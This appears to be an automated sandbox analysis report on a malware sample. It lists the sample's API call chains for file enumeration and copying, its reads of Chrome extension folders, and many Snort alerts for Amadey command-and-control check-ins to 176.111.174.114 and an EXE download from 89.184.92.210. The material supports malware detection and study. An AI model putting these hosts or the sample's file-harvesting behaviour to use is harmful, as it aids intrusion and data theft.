                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
                              Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040657E __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,0_2_0040657E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00404905 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,0_2_00404905
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045F3B6 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,0_2_0045F3B6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00405437 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_00405437
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040F7AE _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_0040F7AE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040F998 __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,0_2_0040F998
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00419F82 FindFirstFileExW,5_2_00419F82
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0211A1D2 FindFirstFileExW,5_2_0211A1D2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00419F82 FindFirstFileExW,10_2_00419F82
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0223A1D2 FindFirstFileExW,10_2_0223A1D2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00406917 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,0_2_00406917
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior

                              Networking:

                              barindex
                              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                              Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.4:49744 -> 89.184.92.210:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49750 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49752 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49753 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49754 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49755 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49756 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49757 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49758 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49759 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49760 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49761 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49762 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49763 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49764 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49765 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49766 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49767 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49768 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49769 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49770 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49771 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49772 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49773 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49774 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49775 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49776 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49777 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49778 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49779 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49780 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49781 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49783 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 100000118 COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt 176.111.174.114:80 -> 192.168.2.4:49782
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49784 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49785 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49787 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49789 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49790 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49791 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49793 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49794 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49795 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49796 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49797 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49798 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49799 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49800 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49801 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49802 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49803 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49804 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49806 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49807 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49808 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49809 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49810 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49811 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49812 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49814 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49815 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49816 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49817 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49818 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49821 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49826 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49876 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49958 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49979 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49982 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49994 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50001 -> 176.111.174.114:80
